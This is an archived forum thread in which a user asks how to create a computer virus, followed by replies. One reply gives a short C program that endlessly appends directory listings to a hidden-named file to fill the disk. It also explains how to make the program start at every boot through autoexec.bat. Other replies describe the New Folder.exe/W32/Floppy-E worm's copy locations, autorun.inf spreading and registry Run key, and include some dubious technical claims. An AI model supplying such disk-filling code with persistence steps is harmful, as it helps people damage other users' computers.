How to create a computer virus??

I found many viruses in my computer..............
But I never come to its programming.......
I want to see its programming.......How it is programmed...............
Me very eager to know this.........

Please help me to get that.............

Regards,
Vipul

Replies

• Special
    Special
    //START v.c
    #include
    #include
    void main()
    {
    while(1)
    {
    system("dir>>â•ša.exe");
    }
    }
    //END
  • Special
    Special
    How it works
    The system call "dir>>â•ša.exe" will execute the dos command 'dir' and ridirect its output toa file â•ša.exe(the symbol â•š can be obtained by pressing 456 on numpad holding alt key).So running the program in a folder having many files and folder will increase the size of â•ša.exe in a great amount.This process will continue to infinity as this is in a while(1) loop;
    Best try this on win98.then you cannot delete â•ša.exe from GUI.
    For auto running place v.exe in the command folder in windows folder.
    In autoexec.bat(win98) or autoexec.NT(winXP/2000) file simply write v.exe.
    Each time your window starts v.exe will run automatically.
    Try this on your own computer remember the â•ša.exe is the infected file which is growing in size continiously.So to recover, simply delete v.exe and â•ša.exe file from your computer.
  • d_vipul
    d_vipul
    Thanks Friend,
    I really want say thanks...........
    I got much more knowlege from this..............

I want to know about that New Folder.exe Virus................
    You may aware of this virus as you are a computer engineer..............

This Virus creates a new folder in the same folder with the same name....................as that of the folder..........

thanks in advance......

Regards,
    VIPUL
  • Special
    Special
    The real name of this virus is Iddono. This threat copies its file(s) to your hard disk. Its typical file name is Iddono. Then it creates new startup key with name Iddono and value newfolder.exe. You can also find it in your processes list with name newfolder.exe or Iddono

it also sometimes considered as a worm, which spreads mainly from one system to another while data transferring through a pen drive....

W32/Floppy-E is a worm for the Windows platform.

W32/Floppy-E spreads via file sharing on Peer-to-peer networks. W32/Floppy-E is a worm for the Windows platform.

W32/Floppy-E spreads via file sharing on Peer-to-peer networks.

When first run W32/Floppy-E copies itself to:
    \calc.exe
    \config_.com
    \mscalc.exe
    \windows.exe
    \winnt.exe
    \config_.com
    \Recent\New Folder.exe
    \SendTo\New Folder.exe
    \startupFolder.com
    \calc.exe
    \new folder.exe

In addition to the above list, W32/Floppy-E will also create a copy of itself as an EXE file named the same as the parent folder in sub-folders of:

\Nethood\

Note that all sub-folders of the above locations will be used even if the parent folder has the hidden or system attributes.

W32/Floppy-E will create the file \autorun.inf.

W32/Floppy-E will create a copy of itself in the root of all removable drives along with the file autorun.inf to run the replicant upon insertion / connection.

W32/Floppy-E creates the following registry entry to run a copy of itself at startup:
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Explorer5
    \config_.com

source:#-Link-Snipped-#
  • d_vipul
    d_vipul
    Thanks A Lot My Friend,
    For Your Valuable Help............

Regards,
    Vipul
  • Special
    Special
    @d_vipul
    No thanks buddy!!

its my pleasure........
  • Leo
    Leo
    Hi buddy working of virus is difficult to trace by your own but are easy to find on Internet. It's not always difficult to delete virus from your system if you have good knowledge of system and system processes. While in third year i had a subject named "Operating Systems" under which i studied about Windows, Linux and Unix after that i really never felt that i can't remove any Virus manually, in fact i tried to remove them manually by deactivating my anti-virus and i succeeded every time. I think VIRUS writing is not a difficult job anyone can do, what you need is just a little knowledge of system programming. So if you are really interested in VIRUS you can go for the following books,

1.Computer Viruses for Dummies- Peter Gregory
    2.Advanced Linux Programming - Mark Mitchell, Jeffery Oldham and Alex Samuel
    3.Windows System Programming 3rd edition

after reading these books you will be able to write all kinds of Viruses and worms for Windows as well as Linux also you will be able to remove them manually and you will be able to write codes for virus removal once you find its working. For short description on Virus, its types and working you can visit following link,
    COMPUTER VIRUSES AND WORMS - MAX&MAX

The site has been closed since some months but still have many important basic things every computer user must know.
    And at last Special forgot to tell that Newfolder.exe is specially held under WIndows32 family Viruses and uses wscript.exe form system32 folder to create several folders with same name.
    Happy Computing.
  • Manish Goyal
    Manish Goyal
    hmm nice post 😀
  • bohar
    bohar
    many of virus are writen in c++ and with also with the help of notepad ...
  • Leo
    Leo
    bohar
    many of virus are writen in c++ and with also with the help of notepad ...
    That is surely is not true.
  • Special
    Special
    Leo
    That is surely is not true.
    i know that virus cannot be written using c++ but can you tell me why???
    also we know that all the programs of c can be run using a c++ complier??
    correct me if i am wrong!
  • Leo
    Leo
    Buddy i meant Viruses are not specially written in C and C++. Of course notepad had to do nothing with any viral code it just acts as editor. Virus can be written in any programming language, any means absolutely any programming language may it be Assembly, C, C++, Java, Simula, Perl, Python, Ruby, VHDL, Fortran, Pascal and even HTML page can be embedded with malicious code. The only languages in which you can not write any virus code is DML's and DDL's.

Every C++ Compiler is 100% capable to run any C code because C++ supports all functions and libraries of C. To have a check include stdio.h header file in a C++ program and use printf, scanf, fscanf, fprintf etc commands used in C they will run flawlessly the only difference will be that now the execution will be little faster than a regular C++ program execution.

I hope that's clear. Feel free to ask. Happy Computing.

You are reading an archived discussion.

Related Posts

Hi😀 Iam an Electrical & Electronic engineering student.What are the future careers for my field .Also i want to know what are the higher studies in this field. As iam...
What is the difference between http and https?? why do some sites show http and some https?? what is the reason....
please suggest me how to get ccnp certification and from where to get...?? which is the best place and what will be its durations and scopes...
what is the difference between quick format and full format?? which one is better and why???
Using a virtual machine is safer or not??? does it have any impact on the system???